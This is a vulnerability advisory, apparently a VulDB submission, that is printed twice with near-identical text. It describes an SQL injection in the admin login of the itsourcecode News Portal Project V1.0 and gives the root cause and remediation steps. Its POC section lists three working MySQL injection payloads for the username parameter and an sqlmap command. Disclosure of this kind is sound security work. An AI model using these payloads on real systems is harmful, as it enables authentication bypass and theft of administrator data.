itsourcecode News Portal Project V1.0 SQL Injection Vulnerability
NAME OF AFFECTED PRODUCT(S):
Vendor Homepage :
https://itsourcecode.com/free-projects/php-project/news-portal-project-php-free-download/
AFFECTED AND/OR FIXED VERSION(S):
Vuldb Submitter :
Vulnerable File:
VERSION(S):
Vulnerability Type:
Root Cause:
-
The root cause of this vulnerability lies in the backend, which directly concatenates user-controllable input ($uname) into the SQL query without any effective parameterization or input validation.
Specifically, the $uname parameter is derived from user input and is directly embedded into the SQL statement:
SELECT AdminUserName, AdminEmailId, AdminPassword FROM tbladmin WHERE (AdminUserName='$uname' OR AdminEmailId='$uname')
Due to the lack of Prepared Statement or parameter binding mechanism, attackers can construct malicious inputs to inject additional SQL statement logic, thereby bypassing authentication or illegally obtaining sensitive information of administrator accounts (such as username, email, and password hash).
Furthermore, the absence of minimal permission verification and security filtering for user inputs in the code further increases the vulnerability to SQL injection attacks.
Impact:
- Attackers can exploit this SQL injection vulnerability to no unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
DESCRIPTION:
-
During the security review of the News Portal Project, a critical SQL injection vulnerability was identified in the /admin/index.php file. The application directly incorporates user-supplied input into an SQL query without proper validation or the use of prepared statements. As a result, attackers can inject malicious SQL queries through the username/email parameter used in the administrator login function.
Successful exploitation of this vulnerability may allow attackers to bypass authentication and gain unauthorized access to sensitive administrative information. Immediate remediation is required to mitigate the risk and ensure the security and integrity of the system and its data.
Vulnerability Location:
'username' parameter (POST)
POC:
Parameter: username (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=admin') RLIKE (SELECT (CASE WHEN (6435=6435) THEN 0x61646d696e ELSE 0x28 END))-- qmBn&password=1&login=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=admin') AND (SELECT 5400 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(5400=5400,1))),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UhRl&password=1&login=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin') AND (SELECT 8875 FROM (SELECT(SLEEP(5)))IOyR)-- lxyO&password=1&login=NO AUTHENTICATION REQUIRED
- Exploitation requires no authentication or prior access to the system.
The following are screenshots of some specific Managemen obtained from testing and running with the sqlmap tool:
sqlmap -u "http://192.168.1.29/News/newsportal/admin/index.php" \
--data="username=admin&password=1&login=" \
-p username
Suggested Repair
1. Use Prepared Statements and Parameter Binding
Prepared statements should be used instead of dynamically constructing SQL queries with user input. By separating SQL logic from input data, prepared statements ensure that user-supplied values are treated strictly as data and cannot be executed as SQL code, effectively preventing SQL injection attacks.
2. Implement Input Validation and Filtering
All user input should be strictly validated and sanitized before being processed. Input values must conform to expected formats and data types (e.g., usernames or IDs should match predefined patterns). Invalid or unexpected input should be rejected at the application level.
3. Minimize Database User Permissions
The database account used by the application should follow the principle of least privilege. It should only have the minimum permissions required for normal operation. Avoid using highly privileged accounts (such as root or admin) for routine database access to reduce the potential impact of a successful attack.
4. Conduct Regular Security Audits
Perform periodic code reviews and security assessments to identify and remediate vulnerabilities in a timely manner. Regular audits help ensure secure coding practices are followed and reduce the risk of similar issues being introduced in future development.
itsourcecode News Portal Project V1.0 SQL Injection Vulnerability
NAME OF AFFECTED PRODUCT(S):
Vendor Homepage :
https://itsourcecode.com/free-projects/php-project/news-portal-project-php-free-download/
AFFECTED AND/OR FIXED VERSION(S):
Vuldb Submitter :
Vulnerable File:
VERSION(S):
Vulnerability Type:
Root Cause:
The root cause of this vulnerability lies in the backend, which directly concatenates user-controllable input ($uname) into the SQL query without any effective parameterization or input validation.
Specifically, the $uname parameter is derived from user input and is directly embedded into the SQL statement:
SELECT AdminUserName, AdminEmailId, AdminPassword FROM tbladmin WHERE (AdminUserName='$uname' OR AdminEmailId='$uname')
Due to the lack of Prepared Statement or parameter binding mechanism, attackers can construct malicious inputs to inject additional SQL statement logic, thereby bypassing authentication or illegally obtaining sensitive information of administrator accounts (such as username, email, and password hash).
Furthermore, the absence of minimal permission verification and security filtering for user inputs in the code further increases the vulnerability to SQL injection attacks.
Impact:
DESCRIPTION:
During the security review of the News Portal Project, a critical SQL injection vulnerability was identified in the
/admin/index.phpfile. The application directly incorporates user-supplied input into an SQL query without proper validation or the use of prepared statements. As a result, attackers can inject malicious SQL queries through the username/email parameter used in the administrator login function.Successful exploitation of this vulnerability may allow attackers to bypass authentication and gain unauthorized access to sensitive administrative information. Immediate remediation is required to mitigate the risk and ensure the security and integrity of the system and its data.
Vulnerability Location:
'username' parameter (POST)
POC:
Parameter: username (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: username=admin') RLIKE (SELECT (CASE WHEN (6435=6435) THEN 0x61646d696e ELSE 0x28 END))-- qmBn&password=1&login= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: username=admin') AND (SELECT 5400 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(5400=5400,1))),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UhRl&password=1&login= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin') AND (SELECT 8875 FROM (SELECT(SLEEP(5)))IOyR)-- lxyO&password=1&login=NO AUTHENTICATION REQUIRED
The following are screenshots of some specific Managemen obtained from testing and running with the sqlmap tool:
sqlmap -u "http://192.168.1.29/News/newsportal/admin/index.php" \
--data="username=admin&password=1&login=" \
-p username
Suggested Repair
1. Use Prepared Statements and Parameter Binding
Prepared statements should be used instead of dynamically constructing SQL queries with user input. By separating SQL logic from input data, prepared statements ensure that user-supplied values are treated strictly as data and cannot be executed as SQL code, effectively preventing SQL injection attacks.
2. Implement Input Validation and Filtering
All user input should be strictly validated and sanitized before being processed. Input values must conform to expected formats and data types (e.g., usernames or IDs should match predefined patterns). Invalid or unexpected input should be rejected at the application level.
3. Minimize Database User Permissions
The database account used by the application should follow the principle of least privilege. It should only have the minimum permissions required for normal operation. Avoid using highly privileged accounts (such as
rootoradmin) for routine database access to reduce the potential impact of a successful attack.4. Conduct Regular Security Audits
Perform periodic code reviews and security assessments to identify and remediate vulnerabilities in a timely manner. Regular audits help ensure secure coding practices are followed and reduce the risk of similar issues being introduced in future development.